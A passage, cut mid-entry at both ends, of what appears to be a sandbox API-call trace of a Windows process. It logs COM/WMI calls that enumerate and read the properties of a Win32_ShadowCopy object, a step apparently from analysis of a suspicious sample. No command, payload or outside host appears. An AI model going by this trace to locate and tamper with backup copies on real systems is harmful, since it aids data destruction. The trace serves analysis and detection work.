[4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64d468 | out: ppvObject=0x1c64d468*=0x1b798970) returned 0x0 [0107.756] IUnknown:QueryInterface (in: This=0x1c8f4788, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64d3f8 | out: ppvObject=0x1c64d3f8*=0x1c8f4790) returned 0x0 [0107.756] IClientSecurity:SetBlanket (This=0x1c8f4790, pProxy=0x1c8f4788, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0107.767] IUnknown:Release (This=0x1c8f4790) returned 0x2 [0107.767] WbemLocator:IUnknown:Release (This=0x1b798970) returned 0x1 [0107.767] CoTaskMemFree (pv=0x1b7952b0) [0107.767] IUnknown:QueryInterface (in: This=0x1c8f4788, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64d090 | out: ppvObject=0x1c64d090*=0x1b798970) returned 0x0 [0107.767] WbemLocator:IUnknown:QueryInterface (in: This=0x1b798970, riid=0x7fef2a9d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c64d110 | out: ppvObject=0x1c64d110*=0x0) returned 0x80004002 [0107.768] WbemLocator:IUnknown:QueryInterface (in: This=0x1b798970, riid=0x7fef2a9d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c64cea8 | out: ppvObject=0x1c64cea8*=0x0) returned 0x80004002 [0107.769] WbemLocator:IUnknown:AddRef (This=0x1b798970) returned 0x3 [0107.769] CoGetContextToken (in: pToken=0x1c64cd60 | out: pToken=0x1c64cd60) returned 0x0 [0107.769] WbemLocator:IUnknown:QueryInterface (in: This=0x1b798970, riid=0x7fef2a9d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64cd20 | out: ppvObject=0x1c64cd20*=0x1b798858) returned 0x0 [0107.769] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x1b798858, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c64cd50 | out: pCid=0x1c64cd50*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0107.769] WbemLocator:IUnknown:Release (This=0x1b798858) returned 0x3 [0107.769] CoGetContextToken (in: pToken=0x1c64cd30 | out: pToken=0x1c64cd30) returned 0x0 [0107.769] WbemLocator:IUnknown:AddRef (This=0x1b798970) returned 0x4 [0107.769] WbemLocator:IUnknown:QueryInterface (in: This=0x1b798970, riid=0x7fef2a9d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64ce48 | out: ppvObject=0x1c64ce48*=0x1b798940) returned 0x0 [0107.769] WbemLocator:IUnknown:Release (This=0x1b798970) returned 0x4 [0107.769] WbemLocator:IRpcOptions:Query (in: This=0x1b798940, pPrx=0x1b798970, dwProperty=2, pdwValue=0x1c64ceb8 | out: pdwValue=0x1c64ceb8) returned 0x80004002 [0107.769] WbemLocator:IUnknown:Release (This=0x1b798940) returned 0x3 [0107.770] WbemLocator:IUnknown:Release (This=0x1b798970) returned 0x2 [0107.770] CoGetContextToken (in: pToken=0x1c64d230 | out: pToken=0x1c64d230) returned 0x0 [0107.770] CoGetContextToken (in: pToken=0x1c64d170 | out: pToken=0x1c64d170) returned 0x0 [0107.770] WbemLocator:IUnknown:AddRef (This=0x1b798970) returned 0x3 [0107.770] WbemLocator:IUnknown:QueryInterface (in: This=0x1b798970, riid=0x1c64d2b0*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x1c64d290 | out: ppvObject=0x1c64d290*=0x1c8f4788) returned 0x0 [0107.770] WbemLocator:IUnknown:Release (This=0x1b798970) returned 0x3 [0107.770] IUnknown:Release (This=0x1c8f4788) returned 0x2 [0107.770] IUnknown:Release (This=0x1c8f4788) returned 0x1 [0107.770] IUnknown:Release (This=0x1c8f45f8) returned 0x2 [0107.791] CoGetContextToken (in: pToken=0x1c64d630 | out: pToken=0x1c64d630) returned 0x0 [0107.791] CoGetContextToken (in: pToken=0x1c64d570 | out: pToken=0x1c64d570) returned 0x0 [0107.791] WbemLocator:IUnknown:AddRef (This=0x1b798970) returned 0x2 [0107.791] WbemLocator:IUnknown:QueryInterface (in: This=0x1b798970, riid=0x1c64d6b0*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x1c64d690 | out: ppvObject=0x1c64d690*=0x1c8f4788) returned 0x0 [0107.791] WbemLocator:IUnknown:Release (This=0x1b798970) returned 0x2 [0107.792] IUnknown:AddRef (This=0x1c8f4788) returned 0x3 [0107.792] IEnumWbemClassObject:Reset (This=0x1c8f4788) returned 0x0 [0107.794] IUnknown:Release (This=0x1c8f4788) returned 0x2 [0107.804] CoTaskMemAlloc (cb=0x8) returned 0x1b77f7e0 [0107.808] IEnumWbemClassObject:Next (in: This=0x1c8f4788, lTimeout=-1, uCount=0x1, apObjects=0x1b77f7e0, puReturned=0x1c64d8b8 | out: apObjects=0x1b77f7e0*=0x1c8f4830, puReturned=0x1c64d8b8*=0x1) returned 0x0 [0109.352] IUnknown:QueryInterface (in: This=0x1c8f4830, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64cbe0 | out: ppvObject=0x1c64cbe0*=0x1c8f4830) returned 0x0 [0109.352] IUnknown:QueryInterface (in: This=0x1c8f4830, riid=0x7fef2a9d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c64cc60 | out: ppvObject=0x1c64cc60*=0x0) returned 0x80004002 [0109.352] IUnknown:QueryInterface (in: This=0x1c8f4830, riid=0x7fef2a9d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c64c9f8 | out: ppvObject=0x1c64c9f8*=0x0) returned 0x80004002 [0109.353] IUnknown:AddRef (This=0x1c8f4830) returned 0x3 [0109.353] CoGetContextToken (in: pToken=0x1c64c8b0 | out: pToken=0x1c64c8b0) returned 0x0 [0109.353] IUnknown:QueryInterface (in: This=0x1c8f4830, riid=0x7fef2a9d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c870 | out: ppvObject=0x1c64c870*=0x1c8f4838) returned 0x0 [0109.353] IMarshal:GetUnmarshalClass (in: This=0x1c8f4838, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c64c8a0 | out: pCid=0x1c64c8a0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0109.353] IUnknown:Release (This=0x1c8f4838) returned 0x3 [0109.354] CoGetContextToken (in: pToken=0x1c64c880 | out: pToken=0x1c64c880) returned 0x0 [0109.354] IUnknown:AddRef (This=0x1c8f4830) returned 0x4 [0109.354] IUnknown:QueryInterface (in: This=0x1c8f4830, riid=0x7fef2a9d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c998 | out: ppvObject=0x1c64c998*=0x0) returned 0x80004002 [0109.354] IUnknown:Release (This=0x1c8f4830) returned 0x3 [0109.354] IUnknown:Release (This=0x1c8f4830) returned 0x2 [0109.354] CoGetContextToken (in: pToken=0x1c64cd40 | out: pToken=0x1c64cd40) returned 0x0 [0109.354] CoGetContextToken (in: pToken=0x1c64cc80 | out: pToken=0x1c64cc80) returned 0x0 [0109.354] IUnknown:AddRef (This=0x1c8f4830) returned 0x3 [0109.354] IUnknown:QueryInterface (in: This=0x1c8f4830, riid=0x1c64cdc0*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1c64cda0 | out: ppvObject=0x1c64cda0*=0x1c8f4830) returned 0x0 [0109.355] IUnknown:Release (This=0x1c8f4830) returned 0x3 [0109.355] IUnknown:Release (This=0x1c8f4830) returned 0x2 [0109.355] IUnknown:Release (This=0x1c8f4830) returned 0x1 [0109.355] CoTaskMemFree (pv=0x1b77f7e0) [0109.355] CoGetContextToken (in: pToken=0x1c64d6c0 | out: pToken=0x1c64d6c0) returned 0x0 [0109.355] IUnknown:AddRef (This=0x1c8f4830) returned 0x2 [0109.369] IWbemClassObject:Get (in: This=0x1c8f4830, wszName="__GENUS", lFlags=0, pVal=0x1c64d830*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d82c*=0, plFlavor=0x1c64d828*=0 | out: pVal=0x1c64d830*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c64d82c*=3, plFlavor=0x1c64d828*=64) returned 0x0 [0109.379] IWbemClassObject:Get (in: This=0x1c8f4830, wszName="__PATH", lFlags=0, pVal=0x1c64d7d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d7cc*=0, plFlavor=0x1c64d7c8*=0 | out: pVal=0x1c64d7d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{4FE73A95-BB7F-48F7-BF4C-A89DCEB97CC9}\"", varVal2=0x0), pType=0x1c64d7cc*=8, plFlavor=0x1c64d7c8*=64) returned 0x0 [0109.380] SysStringLen (param_1="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{4FE73A95-BB7F-48F7-BF4C-A89DCEB97CC9}\"") returned 0x53 [0109.380] CoGetObjectContext (in: riid=0x1c64d768*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c64d760 | out: ppv=0x1c64d760*=0x212498) returned 0x0 [0109.380] IComThreadingInfo:GetCurrentApartmentType (in: This=0x212498, pAptType=0x1c64d780 | out: pAptType=0x1c64d780*=1) returned 0x0 [0109.380] IUnknown:QueryInterface (in: This=0x212498, riid=0x359dd40*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c64d888 | out: ppvObject=0x1c64d888*=0x0) returned 0x80004002 [0109.380] IUnknown:Release (This=0x212498) returned 0x1 [0109.381] CoGetClassObject (in: rclsid=0x1b7738e8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef2a9d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c64cdf0 | out: ppv=0x1c64cdf0*=0x1c8f1720) returned 0x0 [0109.381] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8f1720, riid=0x7fef2a9d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c64cb00 | out: ppvObject=0x1c64cb00*=0x0) returned 0x80004002 [0109.381] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1c8f1720, pUnkOuter=0x0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64cae8 | out: ppvObject=0x1c64cae8*=0x1c8f6a00) returned 0x0 [0109.381] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8f6a00, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c9f0 | out: ppvObject=0x1c64c9f0*=0x1c8f6a00) returned 0x0 [0109.382] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8f6a00, riid=0x7fef2a9d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c64ca70 | out: ppvObject=0x1c64ca70*=0x0) returned 0x80004002 [0109.382] WbemDefPath:IUnknown:AddRef (This=0x1c8f6a00) returned 0x3 [0109.382] CoGetContextToken (in: pToken=0x1c64c6c0 | out: pToken=0x1c64c6c0) returned 0x0 [0109.382] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8f6a00, riid=0x7fef2a9d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c680 | out: ppvObject=0x1c64c680*=0x1b7969e0) returned 0x0 [0109.383] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b7969e0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c64c6b0 | out: pCid=0x1c64c6b0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0109.383] WbemDefPath:IUnknown:Release (This=0x1b7969e0) returned 0x3 [0109.383] CoGetContextToken (in: pToken=0x1c64c690 | out: pToken=0x1c64c690) returned 0x0 [0109.383] WbemDefPath:IUnknown:AddRef (This=0x1c8f6a00) returned 0x4 [0109.383] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8f6a00, riid=0x7fef2a9d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c7a8 | out: ppvObject=0x1c64c7a8*=0x0) returned 0x80004002 [0109.383] WbemDefPath:IUnknown:Release (This=0x1c8f6a00) returned 0x3 [0109.383] WbemDefPath:IUnknown:Release (This=0x1c8f6a00) returned 0x2 [0109.383] WbemDefPath:IUnknown:Release (This=0x1c8f1720) returned 0x0 [0109.384] WbemDefPath:IUnknown:Release (This=0x1c8f6a00) returned 0x1 [0109.384] CoGetContextToken (in: pToken=0x1c64d3c0 | out: pToken=0x1c64d3c0) returned 0x0 [0109.384] CoGetContextToken (in: pToken=0x1c64d300 | out: pToken=0x1c64d300) returned 0x0 [0109.384] WbemDefPath:IUnknown:AddRef (This=0x1c8f6a00) returned 0x2 [0109.384] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8f6a00, riid=0x1c64d440*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c64d420 | out: ppvObject=0x1c64d420*=0x1c8f6a00) returned 0x0 [0109.384] WbemDefPath:IUnknown:Release (This=0x1c8f6a00) returned 0x2 [0109.384] WbemDefPath:IUnknown:Release (This=0x1c8f6a00) returned 0x1 [0109.384] CoGetContextToken (in: pToken=0x1c64d540 | out: pToken=0x1c64d540) returned 0x0 [0109.385] CoGetContextToken (in: pToken=0x1c64d480 | out: pToken=0x1c64d480) returned 0x0 [0109.385] WbemDefPath:IUnknown:AddRef (This=0x1c8f6a00) returned 0x2 [0109.385] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8f6a00, riid=0x1c64d5c0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c64d5a0 | out: ppvObject=0x1c64d5a0*=0x1c8f6a00) returned 0x0 [0109.385] WbemDefPath:IUnknown:Release (This=0x1c8f6a00) returned 0x2 [0109.385] WbemDefPath:IUnknown:AddRef (This=0x1c8f6a00) returned 0x3 [0109.385] WbemDefPath:IWbemPath:SetText (This=0x1c8f6a00, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{4FE73A95-BB7F-48F7-BF4C-A89DCEB97CC9}\"") returned 0x0 [0109.385] WbemDefPath:IUnknown:Release (This=0x1c8f6a00) returned 0x2 [0109.385] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64d800 | out: puCount=0x1c64d800*=0x2) returned 0x0 [0109.385] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d800*=0x0, pszText=0x0 | out: puBuffLength=0x1c64d800*=0x17, pszText=0x0) returned 0x0 [0109.385] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d800*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64d800*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0109.403] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64d2a0 | out: puCount=0x1c64d2a0*=0x2) returned 0x0 [0109.403] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d2a0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64d2a0*=0x17, pszText=0x0) returned 0x0 [0109.403] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d2a0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64d2a0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0109.405] IWbemClassObject:Get (in: This=0x1c8f4830, wszName="__NAMESPACE", lFlags=0, pVal=0x1c64d290*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d28c*=0, plFlavor=0x1c64d288*=0 | out: pVal=0x1c64d290*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c64d28c*=8, plFlavor=0x1c64d288*=64) returned 0x0 [0109.405] SysStringLen (param_1="root\\cimv2") returned 0xa [0109.405] IWbemClassObject:Get (in: This=0x1c8f4830, wszName="__NAMESPACE", lFlags=0, pVal=0x1c64d2a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d29c*=8, plFlavor=0x1c64d298*=64 | out: pVal=0x1c64d2a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c64d29c*=8, plFlavor=0x1c64d298*=64) returned 0x0 [0109.405] SysStringLen (param_1="root\\cimv2") returned 0xa [0109.406] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64d2a0 | out: puCount=0x1c64d2a0*=0x2) returned 0x0 [0109.406] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d2a0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64d2a0*=0x17, pszText=0x0) returned 0x0 [0109.406] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d2a0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64d2a0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0109.406] IWbemClassObject:Get (in: This=0x1c8f4830, wszName="__CLASS", lFlags=0, pVal=0x1c64d290*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d28c*=0, plFlavor=0x1c64d288*=0 | out: pVal=0x1c64d290*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c64d28c*=8, plFlavor=0x1c64d288*=64) returned 0x0 [0109.406] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0109.406] IWbemClassObject:Get (in: This=0x1c8f4830, wszName="__CLASS", lFlags=0, pVal=0x1c64d2a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d29c*=8, plFlavor=0x1c64d298*=64 | out: pVal=0x1c64d2a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c64d29c*=8, plFlavor=0x1c64d298*=64) returned 0x0 [0109.406] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0109.421] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64cce0 | out: puCount=0x1c64cce0*=0x2) returned 0x0 [0109.421] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64cce0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64cce0*=0x17, pszText=0x0) returned 0x0 [0109.421] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64cce0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64cce0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0109.421] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64cce0 | out: puCount=0x1c64cce0*=0x2) returned 0x0 [0109.421] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64cce0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64cce0*=0x17, pszText=0x0) returned 0x0 [0109.421] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64cce0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64cce0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0109.422] IWbemClassObject:GetNames (in: This=0x1c8f4830, wszQualifierName=0x0, lFlags=48, pQualifierVal=0x1c64ccd8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pNames=0x1c64ccd0 | out: pNames=0x1c64ccd0*="\x01ƀ\x08") returned 0x0 [0109.423] SafeArrayGetDim (psa=0x1b7923c0) returned 0x1 [0109.423] IWbemClassObject:Get (in: This=0x1c8f4830, wszName="__GENUS", lFlags=0, pVal=0x1c64ccd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64cccc*=0, plFlavor=0x1c64ccc8*=0 | out: pVal=0x1c64ccd0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c64cccc*=3, plFlavor=0x1c64ccc8*=64) returned 0x0 [0109.423] IWbemClassObject:Get (in: This=0x1c8f4830, wszName="__CLASS", lFlags=0, pVal=0x1c64ccd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64cccc*=0, plFlavor=0x1c64ccc8*=0 | out: pVal=0x1c64ccd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c64cccc*=8, plFlavor=0x1c64ccc8*=64) returned 0x0 [0109.423] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0109.423] IWbemClassObject:Get (in: This=0x1c8f4830, wszName="__SUPERCLASS", lFlags=0, pVal=0x1c64ccd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64cccc*=0, plFlavor=0x1c64ccc8*=0 | out: pVal=0x1c64ccd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CIM_LogicalElement", varVal2=0x0), pType=0x1c64cccc*=8, plFlavor=0x1c64ccc8*=64) returned 0x0 [0109.425] SysStringLen (param_1="CIM_LogicalElement") returned 0x12 [0109.425] IWbemClassObject:Get (in: This=0x1c8f4830, wszName="__DYNASTY", lFlags=0, pVal=0x1c64ccd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64cccc*=0, plFlavor=0x1c64ccc8*=0 | out: pVal=0x1c64ccd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CIM_ManagedSystemElement", varVal2=0x0), pType=0x1c64cccc*=8, plFlavor=0x1c64ccc8*=64) returned 0x0 [0109.425] SysStringLen (param_1="CIM_ManagedSystemElement") returned 0x18 [0109.425] IWbemClassObject:Get (in: This=0x1c8f4830, wszName="__RELPATH", lFlags=0, pVal=0x1c64ccd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64cccc*=0, plFlavor=0x1c64ccc8*=0 | out: pVal=0x1c64ccd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy.ID=\"{4FE73A95-BB7F-48F7-BF4C-A89DCEB97CC9}\"", varVal2=0x0), pType=0x1c64cccc*=8, plFlavor=0x1c64ccc8*=64) returned 0x0 [0109.425] SysStringLen (param_1="Win32_ShadowCopy.ID=\"{4FE73A95-BB7F-48F7-BF4C-A89DCEB97CC9}\"") returned 0x3c [0109.425] IWbemClassObject:Get (in: This=0x1c8f4830, wszName="__PROPERTY_COUNT", lFlags=0, pVal=0x1c64ccd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64cccc*=0, plFlavor=0x1c64ccc8*=0 | out: pVal=0x1c64ccd0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1c, varVal2=0x0), pType=0x1c64cccc*=3, plFlavor=0x1c64ccc8*=64) returned 0x0 [0109.426] IWbemClassObject:Get (in: This=0x1c8f4830, 